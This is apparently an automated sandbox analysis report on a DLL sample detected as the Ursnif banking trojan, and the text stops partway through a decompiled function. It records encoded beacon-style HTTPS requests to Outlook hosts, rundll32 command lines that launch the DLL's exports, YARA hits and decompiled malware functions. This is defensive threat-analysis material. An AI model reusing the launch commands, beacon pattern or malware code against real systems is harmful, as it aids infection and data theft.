                                                                                                          X-RequestId: 628d9d53-49e4-4ca4-94c4-b11208e638b5
                                                                                                          MS-CV: hw4fbmYQr0/ARs5eJiVBhg.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: MWHPR11CA0029
                                                                                                          Date: Mon, 11 Oct 2021 20:36:18 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          3 | 192.168.2.6 | 49778 | 52.98.199.194 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:36:18 UTC | 3 | OUT | GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: www.outlook.com
                                                                                                          2021-10-11 20:36:18 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://outlook.office365.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 0cc5d072-33f2-6f76-f015-ee91bb583d6b
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: AS8P189CA0023
                                                                                                          X-RequestId: 1ed9ec8f-eb8c-4b13-9095-f7b5e6ea2573
                                                                                                          MS-CV: ctDFDPIzdm/wFe6Ru1g9aw.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AS8P189CA0023
                                                                                                          Date: Mon, 11 Oct 2021 20:36:17 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          4 | 192.168.2.6 | 49779 | 52.98.208.66 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:36:18 UTC | 4 | OUT | GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.office365.com
                                                                                                          2021-10-11 20:36:18 UTC | 5 | IN | HTTP/1.1 404 Not Found
                                                                                                          Content-Length: 1245
                                                                                                          Content-Type: text/html
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 5c2fdc38-15df-1f17-392b-827de99c6af9
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-CalculatedFETarget: VI1PR0101CU002.internal.outlook.com
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-FEProxyInfo: VI1PR0101CA0050.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                          X-CalculatedBETarget: VI1PR06MB6510.eurprd06.prod.outlook.com
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-RUM-Validated: 1
                                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                                          MS-CV: ONwvXN8VFx85K4J96Zxq+Q.1.1
                                                                                                          X-FEServer: VI1PR0101CA0050
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AS9PR06CA0070
                                                                                                          Date: Mon, 11 Oct 2021 20:36:17 GMT
                                                                                                          Connection: close
                                                                                                          2021-10-11 20:36:18 UTC | 5 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          5 | 192.168.2.6 | 49780 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:36:19 UTC | 7 | OUT | GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.com
                                                                                                          2021-10-11 20:36:19 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://www.outlook.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 788ce384-07aa-8879-d946-2cc1b02eb792
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: MWHPR11CA0026
                                                                                                          X-RequestId: 738ef795-5233-4365-a8d0-c1e1bcdbffa8
                                                                                                          MS-CV: hOOMeKoHeYjZRizBsC63kg.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: MWHPR11CA0026
                                                                                                          Date: Mon, 11 Oct 2021 20:36:19 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          6 | 192.168.2.6 | 49781 | 52.97.178.34 | 443 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:36:19 UTC | 8 | OUT | GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: www.outlook.com
                                                                                                          2021-10-11 20:36:19 UTC | 8 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://outlook.office365.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: e3fdf5a0-ef19-6991-ae02-d09d6eb6eb6d
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: AM7PR02CA0012
                                                                                                          X-RequestId: 28d1f2b0-6ee7-49fb-91b3-38f8f9eb5739
                                                                                                          MS-CV: oPX94xnvkWmuAtCdbrbrbQ.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AM7PR02CA0012
                                                                                                          Date: Mon, 11 Oct 2021 20:36:19 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          7 | 192.168.2.6 | 49782 | 52.97.178.98 | 443 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:36:19 UTC | 9 | OUT | GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.office365.com
                                                                                                          2021-10-11 20:36:19 UTC | 9 | IN | HTTP/1.1 404 Not Found
                                                                                                          Content-Length: 1245
                                                                                                          Content-Type: text/html
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 8895e295-2c4a-97c0-6a4c-33e5a4e5782a
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-CalculatedFETarget: VI1PR08CU014.internal.outlook.com
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-FEProxyInfo: VI1PR08CA0260.EURPRD08.PROD.OUTLOOK.COM
                                                                                                          X-CalculatedBETarget: VI1PR0401MB2509.EURPRD04.PROD.OUTLOOK.COM
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-RUM-Validated: 1
                                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                                          MS-CV: leKViEoswJdqTDPlpOV4Kg.1.1
                                                                                                          X-FEServer: VI1PR08CA0260
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AM7PR04CA0027
                                                                                                          Date: Mon, 11 Oct 2021 20:36:19 GMT
                                                                                                          Connection: close
                                                                                                          2021-10-11 20:36:19 UTC | 10 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                          Code Manipulations

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Start time:22:33:41
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll'
                                                                                                          Imagebase:0x1320000
                                                                                                          File size:893440 bytes
                                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate

                                                                                                          General

                                                                                                          Start time:22:33:41
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                                                                                                          Imagebase:0x2a0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:33:42
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:33:42
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:33:46
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Fieldeight
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:33:52
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Often
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:35:22
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868
                                                                                                          Imagebase:0x70000
                                                                                                          File size:434592 bytes
                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Start time:22:35:32
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 832
                                                                                                          Imagebase:0x70000
                                                                                                          File size:434592 bytes
                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Start time:22:35:34
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 644
                                                                                                          Imagebase:0x70000
                                                                                                          File size:434592 bytes
                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                            Executed Functions

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E6F031172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                            				intOrPtr _v12;
                                                                                                            				struct _FILETIME* _v16;
                                                                                                            				short _v60;
                                                                                                            				struct _FILETIME* _t14;
                                                                                                            				intOrPtr _t15;
                                                                                                            				long _t18;
                                                                                                            				void* _t19;
                                                                                                            				void* _t22;
                                                                                                            				intOrPtr _t31;
                                                                                                            				long _t32;
                                                                                                            				void* _t34;
                                                                                                            
                                                                                                            				_t31 = __edx;
                                                                                                            				_t14 =  &_v16;
                                                                                                            				GetSystemTimeAsFileTime(_t14);
                                                                                                            				_push(0x192);
                                                                                                            				_push(0x54d38000);
                                                                                                            				_push(_v12);
                                                                                                            				_push(_v16);
                                                                                                            				L6F032160();
                                                                                                            				_push(_t14);
                                                                                                            				_v16 = _t14;
                                                                                                            				_t15 =  *0x6f0341c4;
                                                                                                            				_push(_t15 + 0x6f03505e);
                                                                                                            				_push(_t15 + 0x6f035054);
                                                                                                            				_push(0x16);
                                                                                                            				_push( &_v60);
                                                                                                            				_v12 = _t31;
                                                                                                            				L6F03215A();
                                                                                                            				_t18 = _a4;
                                                                                                            				if(_t18 == 0) {
                                                                                                            					_t18 = 0x1000;
                                                                                                            				}
                                                                                                            				_t19 = CreateFileMappingW(0xffffffff, 0x6f0341c8, 4, 0, _t18,  &_v60); // executed
                                                                                                            				_t34 = _t19;
                                                                                                            				if(_t34 == 0) {
                                                                                                            					_t32 = GetLastError();
                                                                                                            				} else {
                                                                                                            					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                            						if(_t22 == 0) {
                                                                                                            							_t32 = GetLastError();
                                                                                                            							if(_t32 != 0) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							 *_a8 = _t34;
                                                                                                            							 *_a12 = _t22;
                                                                                                            							_t32 = 0;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t32 = 2;
                                                                                                            						L9:
                                                                                                            						CloseHandle(_t34);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t32;
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?,?), ref: 6F03117F
                                                                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6F031195
                                                                                                            • _snwprintf.NTDLL ref: 6F0311BA
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,6F0341C8,00000004,00000000,?,?), ref: 6F0311DF
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?), ref: 6F0311F6
                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6F03120A
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?), ref: 6F031222
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A), ref: 6F03122B
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?), ref: 6F031233
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                            • String ID: @Mxt MxtTxt$`RxtAxt
                                                                                                            • API String ID: 1724014008-1957990577
                                                                                                            • Opcode ID: 440532e5d3c88efd07cd344720d4500a0d4b4758782c38b16a7022c1b1eb31ef
                                                                                                            • Instruction ID: 5c9a9b96623363010087b9b91e752c165f83f85cc1fe91944f22696291a146f3
                                                                                                            • Opcode Fuzzy Hash: 440532e5d3c88efd07cd344720d4500a0d4b4758782c38b16a7022c1b1eb31ef
                                                                                                            • Instruction Fuzzy Hash: 7121BDB7E0012ABFDB10AFA8CC84FDE77B8EB4E364F114525F615DB180D67499518BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E6F0315C6(char _a4) {
                                                                                                            				long _v8;
                                                                                                            				long _v12;
                                                                                                            				char _v36;
                                                                                                            				void* __edi;
                                                                                                            				long _t25;
                                                                                                            				long _t27;
                                                                                                            				long _t28;
                                                                                                            				long _t32;
                                                                                                            				void* _t38;
                                                                                                            				intOrPtr _t40;
                                                                                                            				signed int _t44;
                                                                                                            				signed int _t45;
                                                                                                            				long _t50;
                                                                                                            				intOrPtr _t52;
                                                                                                            				signed int _t53;
                                                                                                            				void* _t57;
                                                                                                            				void* _t60;
                                                                                                            				signed int _t62;
                                                                                                            				signed int _t63;
                                                                                                            				void* _t67;
                                                                                                            				intOrPtr* _t68;
                                                                                                            
                                                                                                            				_t25 = E6F031825();
                                                                                                            				_v8 = _t25;
                                                                                                            				if(_t25 != 0) {
                                                                                                            					return _t25;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					_t62 = 0;
                                                                                                            					_v12 = 0;
                                                                                                            					_t50 = 0x30;
                                                                                                            					do {
                                                                                                            						_t57 = E6F031000(_t50);
                                                                                                            						if(_t57 == 0) {
                                                                                                            							_v8 = 8;
                                                                                                            						} else {
                                                                                                            							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                                                                                            							_t53 = _t44;
                                                                                                            							_t45 = _t44 & 0x0000ffff;
                                                                                                            							_v8 = _t45;
                                                                                                            							if(_t45 == 4) {
                                                                                                            								_t50 = _t50 + 0x30;
                                                                                                            							}
                                                                                                            							_t63 = 0x13;
                                                                                                            							_t10 = _t53 + 1; // 0x1
                                                                                                            							_t62 =  *_t57 % _t63 + _t10;
                                                                                                            							E6F031397(_t57);
                                                                                                            						}
                                                                                                            					} while (_v8 != 0);
                                                                                                            					_t27 = E6F03189E(_t57, _t62); // executed
                                                                                                            					_v8 = _t27;
                                                                                                            					Sleep(_t62 << 4); // executed
                                                                                                            					_t28 = _v8;
